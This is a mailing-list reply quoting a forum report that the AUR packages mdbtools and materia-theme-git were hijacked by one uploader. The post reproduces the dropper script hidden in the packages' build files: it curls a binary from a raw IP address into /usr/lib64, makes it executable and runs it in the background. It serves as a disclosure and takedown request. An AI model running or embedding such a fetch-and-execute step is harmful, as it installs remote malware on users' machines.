Re: AUR Packages Hijacked: mdbtools / materia-theme-git

Marcus Hoffmann Wed, 29 Oct 2025 09:20:43 -0700

Hi,

On 10/29/25 10:43, GlassTree wrote:

Original post: https://bbs.archlinux.org/viewtopic.php?pid=2270179
-----


I've noticed these two packages being "hijacked": mdbtools and materia-theme-git

Both under the same user "koolpp"

The new versions uploaded refer to a shell script available at a Codeberg 
repository:
https://codeberg.org/koolpp/mdbtools/src/branch/main/src/util/Makefile.am
https://codeberg.org/koolpp/materia-theme/src/branch/main/src/gtk-4.0/meson.build

I reported this to codeberg moderation team earlier and the repos havebeen taken down now as well!


The scripts execute the following:

```sh
#!/bin/sh
mkdir -p /usr/lib64
curl -s http://45.94.31.147/prod.bin -o /usr/lib64/libkwrk.so.1.5.3
chmod +x /usr/lib64/libkwrk.so.1.5.3
setsid /usr/lib64/libkwrk.so.1.5.3 &
```

Looks like a remote file will create a background session with execute 
permissions if you install these packages.

May these new packages versions be taken down



Marcus

Re: AUR Packages Hijacked: mdbtools / materia-theme-git

Reply via email to